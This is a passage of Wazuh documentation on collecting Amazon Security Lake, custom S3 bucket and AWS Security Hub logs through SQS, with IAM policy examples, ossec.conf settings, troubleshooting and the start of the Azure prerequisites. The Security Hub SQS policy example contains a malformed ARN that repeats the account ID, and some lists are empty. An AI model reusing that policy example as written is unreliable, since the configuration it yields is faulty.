    • If you enabled Security Lake on more than one AWS account, check if you see each applicable account number listed. Check that parquet files exist inside each account.

  4. In each applicable S3 bucket, navigate to the Properties tab and verify in the Event notifications section that the data destination is the Security Lake SQS queue.

Policy configuration

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are used.

Configuring the role

Follow these steps to modify the Security Lake subscriber role. You have to associate an existing user with the role.

  1. In your AWS console, navigate to the Amazon IAM service.

  2. In your Amazon IAM service, navigate to the Roles page.

  3. In the Roles page, select the Role name of the subscription notification role that was created as part of the Security Lake subscriber provisioning process.

  4. In the Summary page, navigate to the Trust relationships tab to modify the Trusted entity policy.

  5. Modify the Trusted entity policy with the following updates:

    • In the stanza containing the ARN, attach the username from your target user account to the end of the ARN. This step connects a user to the role. It lets you configure the Security Lake service with the secret access key. See the following Trusted entity example:

    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "1",
                "Effect": "Allow",
                "Principal": {
                    "AWS": "arn:aws:iam::<ACCOUNT_ID>:user/<USERNAME>"
                },
                "Action": "sts:AssumeRole",
                "Condition": {
                        "StringEquals": {
                            "sts:ExternalId": [
                                "<WAZUH-EXTERNAL-ID-VALUE>"
                            ]
                        }
                }
            }
        ]
    }
    

    Note

    <ACCOUNT_ID>, <USERNAME> and <WAZUH-EXTERNAL-ID-VALUE> are placeholders. Replace them with the appropriate values.

Granting user permission to switch roles

Follow these steps to configure the user permissions:

  1. In your Amazon IAM service, navigate to the Users page.

  2. In the Users page, select the Username of the user you have connected to the role (<USERNAME>).

  3. Replace <ACCOUNT_ID> and <RESOURCE_ROLE> with the appropriate values and add the following permission to switch to the new role:

    Note that <RESOURCE_ROLE> is the name of the subscription role that was created as part of the Security Lake subscriber provisioning process.

    {
        "Version": "2012-10-17",
        "Statement": [
            {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": "sts:AssumeRole",
            "Resource": "arn:aws:iam::<ACCOUNT_ID>:role/<RESOURCE_ROLE>"
            }
        ]
    }
    
Parameters

The following fields inside the /var/ossec/etc/ossec.conf file of the Wazuh server or agent allow you to configure the queue and authentication:

Queue configuration

  • <sqs_name>: The name of the queue.

  • <service_endpoint> - Optional: The AWS S3 endpoint URL for downloading data from the bucket.

Authentication
  • <iam_role_arn>: Amazon Resource Name (ARN) for the corresponding IAM role to assume.

  • <external_id>: External ID to use when assuming the role.

  • <aws_profile>: A valid profile name from a Shared Credential File or AWS Config File with permissions to access the service. By default, the integration uses the settings found in the default profile. For this configuration, we use the dev profile. Replace it with the appropriate profile defined in your credential file.

  • <iam_role_duration> - Optional: The session duration in seconds.

  • <sts_endpoint> - Optional: The URL of the VPC endpoint of the AWS Security Token Service.

More information about the different authentication methods can be found in the Configuring AWS credentials documentation.
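For reference, a named profile such as the dev profile mentioned above is defined in the shared credentials file (/root/.aws/credentials for the Wazuh module for AWS). The keys below are placeholders, not real values:

[dev]
aws_access_key_id = <YOUR_ACCESS_KEY_ID>
aws_secret_access_key = <YOUR_SECRET_ACCESS_KEY>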

Configure Wazuh to process Amazon Security Lake logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration block to enable the integration with Amazon Security Lake.

    <wodle name="aws-s3">
        <disabled>no</disabled>
        <interval>1h</interval>
        <run_on_start>yes</run_on_start>
        <subscriber type="security_lake">
            <sqs_name>sqs-security-lake-main-queue</sqs_name>
            <iam_role_arn>arn:aws:iam::xxxxxxxxxxx:role/ASL-Role</iam_role_arn>
            <iam_role_duration>1300</iam_role_duration>
            <external_id><WAZUH-EXTERNAL-ID-VALUE></external_id>
            <aws_profile>dev</aws_profile>
            <sts_endpoint>xxxxxx.sts.region.vpce.amazonaws.com</sts_endpoint>
            <service_endpoint>https://bucket.xxxxxx.s3.region.vpce.amazonaws.com</service_endpoint>
        </subscriber>
    </wodle>
    
  3. After setting the required parameters, restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      

Note

The Wazuh module for AWS execution time varies depending on the number of notifications present in the queue. This affects the time to display alerts on the Wazuh dashboard. If the <interval> value is less than the execution time, the Interval overtaken message appears in the /var/ossec/logs/ossec.log file.

Visualizing alerts in Wazuh dashboard

Once you set the configuration and restart the manager, you can visualize the Amazon Security Lake alerts on the Wazuh dashboard. To do this, go to the Threat Hunting module. Apply the filter rule.groups: amazon_security_lake for an easier visualization.

Custom Logs Buckets

Amazon Simple Queue Service (Amazon SQS) is a fully managed message queuing service. It offers secure, durable, and available hosted queues to decouple and scale software systems and components. It allows sending, storing, and receiving messages between software components at any volume, without losing messages or requiring other services to be available. These features make it an optimal component to associate with Amazon S3 buckets to consume any type of log.

Combining Amazon SQS with Amazon S3 buckets allows Wazuh to collect JSON, CSV, and plain text logs from any custom path. The origin of these logs doesn't even need to be AWS.

Note

To properly process CSV logs, they must include column headers.
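For example, a hypothetical CSV log needs a header row as its first line, similar to the following:

timestamp,src_ip,action
2024-06-01T10:00:00Z,192.168.1.10,ALLOW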

To set up the Wazuh integration for Custom Logs Buckets, you need to do the following:

  1. Create an AWS SQS Queue.

  2. Configure an S3 bucket. For every object creation event, the bucket sends notifications to the queue.

AWS configuration

The following sections cover how to configure Custom Logs Buckets to integrate with Wazuh.

Amazon Simple Queue Service
  1. Set up a Standard type SQS Queue with the default configurations. You can apply an Access Policy similar to the following example, where <REGION>, <ACCOUNT_ID>, <SQS-NAME>, and <S3-BUCKET> are the region, the account ID, the SQS queue name, and the name you will give to the S3 bucket.

    {
    "Version": "2012-10-17",
    "Id": "example-ID",
    "Statement": [
      {
        "Sid": "example-access-policy",
        "Effect": "Allow",
        "Principal": {
          "Service": "s3.amazonaws.com"
        },
        "Action": "SQS:SendMessage",
        "Resource": "arn:aws:sqs:<REGION>:<ACCOUNT_ID>:<SQS-NAME>",
        "Condition": {
          "StringEquals": {
            "aws:SourceAccount": "<ACCOUNT_ID>"
          },
          "ArnLike": {
            "aws:SourceArn": "arn:aws:s3:*:*:<S3-BUCKET>"
          }
        }
      }
    ]
    }
    

You can configure your access policy to accept S3 notifications from different account IDs and to apply different conditions. For more information, see Managing access in Amazon SQS.

Amazon S3 and Event Notifications

To configure an S3 bucket that reports creation events, do the following.

  1. Configure an S3 bucket as defined in the configuring an S3 bucket section. Use the name you chose in the previous section.

  2. Once created, go to Event notifications inside the Properties tab. Select Create event notification.

  3. In Event Types, select All object create events. This generates notifications for any type of event that results in the creation of an object in the bucket.

  4. In the Destination section, select the following options:

    • SQS queue

    • Choose from your SQS queues

  5. Choose the queue you created previously.

Configuration parameters

Configure the following fields to set the queue and authentication configuration. For more information, check the subscribers reference.

Queue
  • <sqs_name>: The name of the queue.

  • <service_endpoint> - Optional: The AWS S3 endpoint URL for downloading data from the bucket. Check Using VPC and FIPS endpoints for more information about VPC and FIPS endpoints. Both parameters are shown in the sketch below.
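The following sketch shows where both parameters go inside the subscriber block. The queue name and VPC endpoint URL are placeholders; omit the optional <service_endpoint> line when no VPC endpoint is used:

<subscriber type="buckets">
    <sqs_name>custom-logs-queue</sqs_name>
    <service_endpoint>https://bucket.xxxxxx.s3.region.vpce.amazonaws.com</service_endpoint>
    <aws_profile>default</aws_profile>
</subscriber>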

Authentication

The available authentication methods are the following:

These authentication methods require using the /root/.aws/credentials file to provide credentials. You can find more information in configuring AWS credentials.

The available authentication configuration parameters are the following:

Configure Wazuh to process logs from Custom Logs Buckets

Warning

Every message sent to the queue is read and deleted. Make sure you only use the queue for bucket notifications.

  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the SQS name and your configuration parameters for the buckets service. Set this inside <subscriber type="buckets">. For example:

    <wodle name="aws-s3">
        <disabled>no</disabled>
        <interval>1h</interval>
        <run_on_start>yes</run_on_start>
        <subscriber type="buckets">
            <sqs_name>sqs-queue</sqs_name>
            <aws_profile>default</aws_profile>
        </subscriber>
    </wodle>
    

    Check the Wazuh module for AWS reference manual to learn more about the available settings.

Note

The amount of notifications present in the queue affects the execution time of the Wazuh module for AWS. If the <interval> value for the waiting time between executions is too short, the interval overtaken warning is logged into the /var/ossec/logs/ossec.log file.

  3. Save the changes and restart Wazuh to apply them. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
AWS Security Hub

AWS Security Hub automates security best practice checks and aggregates insights to help users understand their overall security posture across multiple AWS accounts. Security Hub helps users assess their compliance against security best practices. It achieves this by:

  • Running checks against security controls.

  • Generating control findings.

  • Grouping related findings into collections called insights.

You need to perform the following to set up the integration that allows you to receive Security Hub events on your Wazuh environment:

  1. Configure your AWS environment. This involves:

    • Enabling Amazon Security Hub. There are two methods to enable Amazon Security Hub in your environment. Please see the enabling Security Hub section.

    • Creating a Firehose stream: Amazon EventBridge is a serverless event bus service that makes it easy to connect applications using events from AWS services, integrated SaaS applications, and custom sources in real time. EventBridge needs a target, such as a Firehose stream, and triggers the target when it receives an event matching the event pattern defined in a rule.

    • Integrating Security Hub with EventBridge: EventBridge allows storing Security Hub findings and insights in S3 buckets.

    • Enabling an Amazon S3 bucket to include event notifications: The bucket sends notifications to the queue for every Security Hub object creation event.

    • Enabling an Amazon SQS queue: The Amazon Simple Queue Service (SQS) is a message queuing service that enables decoupled communication between AWS components. The Wazuh module for AWS will query the SQS for notifications of created logs in S3 and generate alerts from Security Hub logs.

  2. Configure the Wazuh module for AWS to receive Amazon Security Hub events.

Amazon configuration
Enabling Security Hub

Search for “Security Hub” using the AWS console search bar to determine the best method that suits your environment. There are two ways to enable AWS Security Hub:

  • Manual Integration: We recommend this method for standalone accounts with a single organization. The screenshot below shows how to enable AWS Security Hub using the AWS Security Hub console. Please follow the enabling Security Hub manually guideline to find other methods to enable the AWS Security Hub.

    Enable AWS Security Hub
  • Organizations integration: We recommend this method for multi-account and multi-region environments. Your organization must have a delegated administrator account. Please follow the enabling Security Hub with organizations integration guidelines to set your AWS Security Hub using this method.

Creating a Firehose stream

The Amazon Firehose stream serves as the channel for sending the AWS Security Hub logs to the S3 bucket. Follow the steps below to create an Amazon Firehose stream for your Amazon Security Hub logs.

  1. Go to the Amazon Data Firehose service and click Create Firehose stream.

    Create Firehose stream
  2. Select Direct PUT as the source and Amazon S3 as the destination.

    Create Firehose stream
  3. Choose or create your proposed Amazon S3 bucket. You can use an Amazon S3 bucket prefix, but this is optional.

    Create Firehose stream
  4. Click Create Firehose stream.

Integrating Security Hub with EventBridge

Integrating Security Hub with EventBridge enables the storage of Security Hub events in S3 buckets.

There are three types of events available, each using a specific EventBridge event format. The Wazuh integration takes every relevant detail and detail-type value from them.

  • Security Hub Findings - Imported: Security Hub automatically sends events of this type to EventBridge. They include new findings and updates to existing findings, each containing a single finding.

  • Security Hub Findings - Custom Action: When you trigger custom actions, Security Hub sends these events to EventBridge. The custom actions associate the events with their findings.

  • Security Hub Insight Results: This event processes the Security Hub Insights. You can use custom actions to send sets of insight results to EventBridge. Insight results are the resources that match an insight.

To send the last two types of events to EventBridge, you need to create a custom action in Security Hub. Please refer to the Amazon Security Hub documentation to achieve this. Find more information about the types of Security Hub integration with EventBridge.
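For illustration, an EventBridge event pattern that matches only the first event type would look similar to the following; selecting Security Hub and All Events in the console steps below builds a broader, equivalent pattern automatically:

{
  "source": ["aws.securityhub"],
  "detail-type": ["Security Hub Findings - Imported"]
}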

To integrate Security Hub with EventBridge, you must create an event rule in EventBridge.

  1. Go to the Amazon EventBridge and create a new EventBridge rule.

    Create EventBridge rule
  2. Enter a name for the rule and select Rule with an event pattern. Then click on Next.

    Create EventBridge rule
  3. Scroll down to Event pattern. Select Security Hub as the AWS service and All Events in the Event type. Then click on Next.

    Create EventBridge rule
  4. Select Firehose stream as the target, and use the Firehose stream you created in the previous section. Click on Next.

    Create EventBridge rule
  5. Leave the other default options and create the EventBridge rule.

The AWS documentation provides steps to configure an EventBridge rule for AWS Security Hub.

Amazon S3 bucket with event notifications

Follow the steps below to configure an S3 bucket that reports the creation of events.

  1. Configure an S3 bucket as defined in the configuring an AWS S3 Bucket section. Use the name you chose in the previous section.

  2. Go to Event notifications inside the Properties tab. Select Create event notification.

  3. Select All object create events in Event Types. This generates notifications for any event that creates an object in the bucket.

  4. Select SQS queue in the Destination section.

  5. Select Choose from your SQS queues. Then, choose the queue you created previously.

Amazon Simple Queue Service

Amazon Simple Queue Service is a fully managed message queuing service that makes it easy to decouple and scale microservices, distributed systems, and serverless applications.

In this case, it notifies the Wazuh module for AWS of new events to pull from the S3 bucket.

  1. Set up a Standard type SQS Queue with the default configurations. You can apply an access policy similar to the following example, where <REGION>, <AWS_ACCOUNT_ID>, <S3_BUCKET>, and <YOUR_SQS_QUEUE_NAME> are your region, account ID, S3 bucket name, and SQS queue name.

    {
    "Version": "2012-10-17",
    "Id": "SecurityHub-ID",
    "Statement": [
      {
        "Sid": "example-access-policy",
        "Effect": "Allow",
        "Principal": {
          "Service": "s3.amazonaws.com"
        },
        "Action": "SQS:SendMessage",
        "Resource": "arn:aws:sqs:<REGION>:<AWS_ACCOUNT_ID>:<AWS_ACCOUNT_ID>:<YOUR_SQS_QUEUE_NAME>",
        "Condition": {
          "StringEquals": {
            "aws:SourceAccount": "<AWS_ACCOUNT_ID>"
          },
          "ArnLike": {
            "aws:SourceArn": "arn:aws:s3:*:*:<S3_BUCKET>"
          }
        }
      }
    ]
    }
    

    The other settings related to this configuration are:

    • "Version" specifies the version of the policy language being used, in this case, the version from 2012-10-17.

    • "Id" is a unique identifier for this policy.

    • "Statement" is an array that contains the individual permission statements for this policy.

    • "Sid" is an optional identifier that provides a way to give the statement a unique name.

    • "Effect" defines whether the statement results in an "Allow" or "Deny" for the specified actions.

    • "Principal" specifies the AWS service or account allowed to access the resource, in this case, the "s3.amazonaws.com" service.

    • "Action" specifies the action that is allowed or denied, in this case, "SQS", which allows sending messages to an SQS queue.

    • "Condition" specifies conditional elements that must be met for the policy to take effect.

    • "Resource" is the ARN of your SQS queue.

    • "aws:SourceAccount" is your AWS account ID.

    • "aws:SourceArn" is the ARN of the Amazon S3 bucket created for your Amazon Security Hub logs.

  2. You can set your access policy to accept S3 notifications from different account IDs and apply different conditions. For more information, see managing access in Amazon SQS.

Wazuh configuration
Authentication

The available authentication methods are the following:

These authentication methods require providing credentials using the /root/.aws/credentials file. For more information, see configuring AWS credentials.

Configuration

You can perform the following configuration on the Wazuh server or Linux-based Wazuh agent.

  1. Edit the /var/ossec/etc/ossec.conf file. Add the SQS name within the <sqs_name> tag. For example:

    <wodle name="aws-s3">
        <disabled>no</disabled>
        <interval>1h</interval>
        <run_on_start>yes</run_on_start>
        <subscriber type="security_hub">
           <sqs_name>YOUR_SQS_QUEUE_NAME</sqs_name>
           <aws_profile>YOUR_AWS_CREDENTIAL_PROFILE</aws_profile>
       </subscriber>
    </wodle>
    

    Where:

    • <interval> is the time between each log pull.

    • <run_on_start> pulls AWS Security Hub logs each time the Wazuh server starts.

    • <subscriber type="security_hub"> is the tag added to obtain AWS Security Hub logs.

    • <sqs_name> is the name of the Amazon SQS queue created in the previous section.

    Optional

    • <service_endpoint> – The AWS S3 endpoint URL for data downloading from the bucket. Check using non-default AWS endpoints for more information about VPC and FIPS endpoints.

  2. Restart the Wazuh server or agent to apply the changes.

    • Wazuh server:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      

Check the AWS S3 module reference to learn more about the available settings. Configure the following fields to set the queue and authentication configuration. For more information, check the subscriber’s reference.

Warning

Every message sent to the queue is read and deleted. Make sure you only use the queue for bucket notifications.

Visualizing the events

You can view these logs via the Threat Hunting dashboard of the agent where you configured the Wazuh module for AWS.

The following dashboard shows the top 5 AWS Security Hub alerts discovered within 90 days.


The image below shows an event with a high severity.

Troubleshooting

The information below is intended to assist in troubleshooting issues.

Checking if the Wazuh module for AWS is running

When the Wazuh module for AWS runs, it writes its output to the ossec.log file. This log file can be found in /var/ossec/logs/ossec.log and under Server Management > Logs if you use the Wazuh dashboard. You can check whether the Wazuh module for AWS is running without issues by looking at the /var/ossec/logs/ossec.log file. These are the messages displayed in the file, depending on how the Wazuh module for AWS has been configured:

  • When the Wazuh module for AWS is starting:

    2022/03/04 00:00:00 wazuh-modulesd:aws-s3: INFO: Module AWS started
    2022/03/04 00:00:00 wazuh-modulesd:aws-s3: INFO: Starting fetching of logs.
    
  • When Scheduled scan is set:

    2022/03/04 00:00:00 wazuh-modulesd:aws-s3: INFO: Starting fetching of logs.
    2022/03/04 00:00:00 wazuh-modulesd:aws-s3: INFO: Fetching logs finished.
    
  • When the Wazuh module for AWS has finished its execution and is waiting until the interval condition is met:

    2022/03/04 00:00:00 wazuh-modulesd:aws-s3: INFO: Fetching logs finished.
    
Enabling debug mode

You can obtain additional information about the Wazuh module for AWS execution by enabling debug mode, which lets you see INFO or DEBUG messages. There are three different debug levels available:

  • Debug level 0: Only ERROR and WARNING messages are written in the /var/ossec/logs/ossec.log file. This is the default value.

  • Debug level 1: In addition to ERROR and WARNING messages, INFO messages are written in the /var/ossec/logs/ossec.log file too. They are useful to check the execution of the module without having to manage large amounts of DEBUG messages.

  • Debug level 2: This is the highest level of verbosity. Every message type is dumped into the /var/ossec/logs/ossec.log file, including DEBUG messages, which contain the details of the different operations performed by the Wazuh module. This is the recommended mode when troubleshooting the Wazuh module for AWS.

Follow these steps to enable debug mode:

  1. Add the following line to the /var/ossec/etc/local_internal_options.conf file of the Wazuh server or agent, specifying the desired debug level:

    wazuh_modules.debug=2
    
  2. Restart the Wazuh service.

    Wazuh manager

    # systemctl restart wazuh-manager
    

    Wazuh agent

    # systemctl restart wazuh-agent
    

Note

Don't forget to disable debug mode once the troubleshooting has finished. Leaving debug mode enabled could result in large amounts of logs being added to the /var/ossec/logs/ossec.log file.

Checking if logs are being processed

The easiest way to check if the logs are being processed, regardless of the type of bucket or service configured and regardless of whether alerts are being generated, is by using the logall_json parameter.

To understand how the logall_json parameter works, it is necessary to understand the flow a log follows from processing until the corresponding alert is displayed on the Wazuh dashboard. It is as follows:

  1. The Wazuh module for AWS downloads the logs available in AWS for the requested date and path. Check the Considerations for the Wazuh module for AWS configuration page to learn more about how to properly filter the logs.

  2. The content of these logs is sent to the analysis engine in the form of an Event.

  3. The analysis engine evaluates these events and compares them with the different rules available. If the event matches any of the rules, an alert is generated, which is what is ultimately shown on the Wazuh dashboard.

With this in mind, it is possible to enable the Wazuh archives using the logall_json option. When this option is activated, Wazuh stores every event sent to the analysis engine in the /var/ossec/logs/archives/archives.json file, whether it triggered a rule or not. By checking this file, you can determine if the AWS events are being sent to the analysis engine and, therefore, that the Wazuh module for AWS is working as expected.
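As a minimal example, the Wazuh archives are enabled by setting logall_json in the <global> section of the Wazuh server /var/ossec/etc/ossec.conf file and then restarting the wazuh-manager service:

<ossec_config>
  <global>
    <logall_json>yes</logall_json>
  </global>
</ossec_config>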

Note

Don't forget to disable the logall_json parameter once the troubleshooting has finished. Leaving it enabled could result in high disk space consumption.

Common problems and solutions
Unable to locate credentials

The Wazuh module for AWS does not work and the following error messages appear in the /var/ossec/logs/ossec.log file:

2022/03/03 16:01:48 wazuh-modulesd:aws-s3: WARNING: Bucket:  -  Returned exit code 12
2022/03/03 16:01:48 wazuh-modulesd:aws-s3: WARNING: Bucket:  -  Unable to locate credentials
Solution

No authentication method was provided within the configuration of the Wazuh module for AWS. Check the Configuring AWS credentials section to learn more about the different options available and how to configure them.

Invalid credentials to access S3 Bucket

The Wazuh module for AWS does not work and the following error messages appear in the /var/ossec/logs/ossec.log file:

2022/03/03 16:06:56 wazuh-modulesd:aws-s3: WARNING: Bucket:  -  Returned exit code 3
2022/03/03 16:06:56 wazuh-modulesd:aws-s3: WARNING: Bucket:  -  Invalid credentials to access S3 Bucket
Solution

Make sure the credentials provided grant access to the requested S3 bucket and the bucket itself exists.

The config profile could not be found

The Wazuh module for AWS does not work and the following error messages appear in the /var/ossec/logs/ossec.log file:

2022/03/03 15:49:34 wazuh-modulesd:aws-s3: WARNING: Bucket:  -  Returned exit code 12
2022/03/03 15:49:34 wazuh-modulesd:aws-s3: WARNING: Bucket:  -  The config profile (default) could not be found
Solution

Ensure the profile value specified in the configuration matches an existing one placed in /root/.aws/credentials. Check the Profiles section to learn more about configuring a profile for authentication.

The security token included in the request is invalid

The Wazuh module for AWS does not work and the following error messages appear in the /var/ossec/logs/ossec.log file:

2022/03/03 16:16:18 wazuh-modulesd:aws-s3: WARNING: Service: cloudwatchlogs  -  Returned exit code 12
2022/03/03 16:16:18 wazuh-modulesd:aws-s3: WARNING: Service: cloudwatchlogs  -  An error occurred (InvalidClientTokenId) when calling the GetCallerIdentity operation: The security token included in the request is invalid.
Solution

Either no credentials were provided to access CloudWatch Logs, or the credentials provided don't grant access to CloudWatch Logs. Check the Configuring AWS credentials section to learn more about the different options available and how to configure them.

There are no AWS alerts present on the Wazuh dashboard

The Wazuh module for AWS is running but no alerts are displayed on the Wazuh dashboard.

Solution

First of all, review ERROR or WARNING messages in the /var/ossec/logs/ossec.log file by enabling debug mode. If the Wazuh module for AWS is running as expected but no alerts are being generated, it could mean there is no reason for alerts to be raised in the first place. Check the following to verify this:

  • Make sure there is data available for the given date.

    When running, the Wazuh module for AWS requests from AWS the logs corresponding to the date indicated using the only_logs_after parameter. If this parameter is not specified, it tries to obtain the logs corresponding to the day of execution. Make sure you are specifying a value for only_logs_after and that there is data available for that particular date. Check the Considerations for the Wazuh module for AWS configuration page to learn more about how to properly filter the logs using the only_logs_after parameter, and see the sketch after this list for where the parameter is set.

  • Check if the events are being sent to the analysis engine.

    A common scenario is that no alerts are being generated because the events do not match any of the available rules. Take a look at the Checking if logs are being processed section to learn how to check if the AWS logs are being sent to the analysis engine.
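A minimal sketch of where only_logs_after is set, assuming a hypothetical CloudTrail bucket named wazuh-example-bucket; adjust the bucket type, name, and date to your environment:

<wodle name="aws-s3">
    <disabled>no</disabled>
    <interval>10m</interval>
    <run_on_start>yes</run_on_start>
    <bucket type="cloudtrail">
        <name>wazuh-example-bucket</name>
        <only_logs_after>2022-JAN-01</only_logs_after>
        <aws_profile>default</aws_profile>
    </bucket>
</wodle>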

CloudWatch Logs integration is running but no alert is shown on the Wazuh dashboard

The Wazuh module for AWS is running without any error or warning messages, but no alerts from CloudWatch Logs are displayed on the Wazuh dashboard.

Solution

A common scenario is that no alerts are being generated because the events do not match any of the available rules. Take a look at the Checking if logs are being processed section to learn how to check if the AWS logs are being sent to the analysis engine.

Take into account that Wazuh does not provide default rules for the different logs that can be found in CloudWatch Logs, since they can have any format and come from any source. Because of this, if you want to use this integration to process custom logs, you will most likely have to configure your own rules for them. Take a look at the Custom rules section to learn more about this topic.

Interval overtaken message is present in the log file

The Interval overtaken message is present in the /var/ossec/logs/ossec.log file.

Solution

This is not an issue but a warning. It means the time the Wazuh module for AWS required to finish the last execution was greater than the defined interval value. It is important to note that the next run will not start until the previous one has finished.
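If the warning appears on every run, consider raising the interval so it exceeds the typical execution time. A minimal sketch, assuming executions regularly take longer than one hour:

<wodle name="aws-s3">
    <disabled>no</disabled>
    <interval>6h</interval>
    <run_on_start>yes</run_on_start>
    <!-- bucket, service, or subscriber blocks go here -->
</wodle>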

Error codes reference
  1. Errors in the /var/ossec/logs/ossec.log file of the Wazuh server or agent.

    The exit codes and their possible remediation are as follows:

    • 1 - Unknown error: Programming error. Please open an issue in the Wazuh GitHub repository with the trace of the error.

    • 2 - SIGINT: The module stopped due to an interrupt signal.

    • 3 - Invalid credentials to access S3 bucket: Make sure that your credentials are correct. For more information, see the Configuring AWS credentials section.

    • 4 - boto3 module missing: Install the boto3 library. For more information, see the Installing dependencies section.

    • 5 - Unexpected error accessing SQLite DB: Check that no other instances of the Wazuh module for AWS are running at the same time.

    • 6 - Unable to create SQLite DB: Make sure that the wodle has the right permissions in its directory.

    • 7 - Unexpected error querying/working with objects in S3: Check that no other instances of the Wazuh module for AWS are running at the same time.

    • 8 - Failed to decompress file: Only .gz and .zip compression formats are supported.

    • 9 - Failed to parse file: Ensure that the log file contents have the expected structure.

    • 10 - pyarrow module missing: Install the pyarrow library. For more information, see the Installing dependencies section.

    • 11 - Unable to connect to Wazuh: Ensure that Wazuh is running.

    • 12 - Invalid type of bucket: Check that the bucket type is one of the supported types.

    • 13 - Error sending message to Wazuh: Make sure that Wazuh is running.

    • 14 - Empty bucket: Make sure that the path to the log files is correct.

    • 15 - Invalid VPC endpoint URL: Ensure that the VPC endpoint URL provided is correct.

    • 16 - Throttling error: AWS is receiving more than 10 requests per second. Try running the module again when the number of requests to AWS has decreased. For more information, see the Connection configuration for retries section.

    • 17 - Invalid file key format: Ensure that the file path follows the format specified in the supported services.

    • 18 - Invalid prefix: Make sure that the indicated path exists in the S3 bucket.

    • 19 - The server datetime and datetime of the AWS environment differ: Make sure that the server datetime is correctly set.

    • 20 - Unable to find SQS: Make sure that the sqs_name value in the Wazuh module for AWS configuration in the ossec.conf file is correct.

    • 21 - Failed fetch/delete from SQS: Check that no other instances of the Wazuh module for AWS are running at the same time.

    • 22 - Invalid region: Check the provided region in the ossec.conf file.

    • 23 - Profile not found: Check the provided aws_profile in the ossec.conf file.

Monitoring Microsoft Azure with Wazuh

Microsoft Azure is a cloud computing platform by Microsoft that offers a wide range of services, including computing power, storage options, and networking capabilities. It provides solutions for various applications such as virtual computing, analytics, storage, and networking, catering to the diverse needs of businesses and developers. Securing your cloud instance is an essential consideration for companies that use cloud services offered by cloud providers such as Microsoft Azure.

Wazuh, an open source security monitoring platform, offers solutions for collecting and analyzing data generated by security and runtime events within Microsoft Azure environments. Integrating Wazuh with Microsoft Azure enhances the security posture of Azure deployments and ensures compliance with regulatory standards and operational integrity.

This section provides instructions for monitoring Microsoft Azure infrastructures.

Monitoring instances

The Wazuh agent is cross-platform compatible, meaning it can run on various operating systems, such as Windows, Linux, and macOS. It collects data on different systems and applications and ensures the instance benefits from other Wazuh capabilities, such as File Integrity Monitoring (FIM) and Security Configuration Assessment (SCA). This data is sent to the Wazuh server through an encrypted and authenticated channel. A unique pre-shared key registration process establishes this secure channel.

You can install the Wazuh agent on the virtual machines in your Microsoft Azure environment. Monitoring cloud virtual machines using the Wazuh agent is beneficial because it ensures comprehensive security and performance oversight, enabling early detection of potential threats and operational issues in dynamic cloud environments.

Check the Wazuh agent installation and enrollment documentation to learn more about the Wazuh agents. Additionally, read about Wazuh SIEM and XDR capabilities and their configuration in our capabilities documentation.

Monitoring Azure platform and services

Azure Monitor Logs collects and organizes logs and performance data from monitored resources, including Azure services, virtual machines, and applications. This insight is sent to Wazuh using the Azure Log Analytics REST API or by directly accessing the contents of a Microsoft Azure Storage account. The Wazuh module for Azure enables centralized logging, threat detection, and compliance management of your Microsoft Azure environments from your Wazuh deployment.

The Wazuh module for Azure requires dependencies and credentials to access your Microsoft Azure logs. These dependencies are available by default on the Wazuh manager, but you must install them when you use a Wazuh agent for the integration. Take a look at the Prerequisites section before proceeding.

Prerequisites
Installing dependencies

You can configure the Wazuh module for Azure either in the Wazuh manager or in a Wazuh agent. This choice depends solely on how you access your Azure infrastructure in your environment.

You only need to install dependencies when configuring the integration with Azure in a Wazuh agent. The Wazuh manager already includes all the necessary dependencies.

Python

The Wazuh module for Azure is compatible with Python 3.8–3.13. While later Python versions should work as well, we can't guarantee they are compatible. If you do not have Python 3 already installed, run the following command on your monitored endpoint.

# apt-get update && apt-get install python3

You can install the required modules with Pip, the Python package manager. Most UNIX distributions have this tool available in their software repositories. Run the following command to install pip on your endpoint if you do not have it already installed.

# apt-get update && apt-get install python3-pip

We recommend using Pip 19.3 or later to simplify the installation of the dependencies. Run this command to check your pip version.

# pip3 --version

An example output is as follows.

pip 22.0.2 from /usr/lib/python3/dist-packages/pip (python 3.10)

If your pip version is less than 19.3, run the following command to upgrade the version.

# pip3 install --upgrade pip
Azure Storage client library for Python

You need the libraries in the command below to set up your Wazuh agent endpoint and monitor your Microsoft Azure platform and services.

# pip3 install azure-storage-blob==12.20.0 azure-storage-common==2.1.0 azure-common==1.1.25 cryptography==3.3.2 cffi==1.14.4 pycparser==2.20 six==1.14.0 python-dateutil==2.8.1 requests==2.25.1 certifi==2022.12.07 chardet==3.0.4 idna==2.9 urllib3==1.26.18 SQLAlchemy==2.0.23 pytz==2020.1
Configuring Azure credentials

The Wazuh module for Azure must have access credentials to connect to Azure successfully. The credentials required vary depending on the type of monitoring. These include:

  • Access credentials for Microsoft Graph and Azure Log Analytics

  • Access credentials for Microsoft Azure Storage

The following sections provide an overview of how you can create these credentials.

Getting access credentials for Microsoft Graph and Azure Log Analytics

You need valid application_id and application_key values to authenticate connection from the Wazuh module for Azure.

Follow the steps below to obtain an application_id and application_key:

  1. Go to Microsoft Entra ID and navigate to the registered application.

  2. Go to the Certificates & secrets section of the chosen application, then generate a secret key by selecting New client secret.

  3. Give the key a descriptive name and specify the duration for which the key should remain active, then select Add.

  4. Copy the Value and the Secret ID. Ensure you securely store these values, as you can only view them once. The Value is the application_key.

  5. Copy the application_id value for your registered application from the Overview section.

Getting access credentials for Microsoft Azure Storage

The Microsoft Azure Storage requires valid account_name and account_key values. You can obtain them in the Access keys section of Storage accounts on your Azure environment. Follow the Microsoft guide to create a storage account.

The section below shows the steps to retrieve the Microsoft Azure Storage account key.

  1. Go to the Storage accounts section of your Microsoft Azure environment and select the account of interest.

  2. Navigate to Access keys located on the left pane to access the account_name and account_key values.

Wazuh Azure authentication file

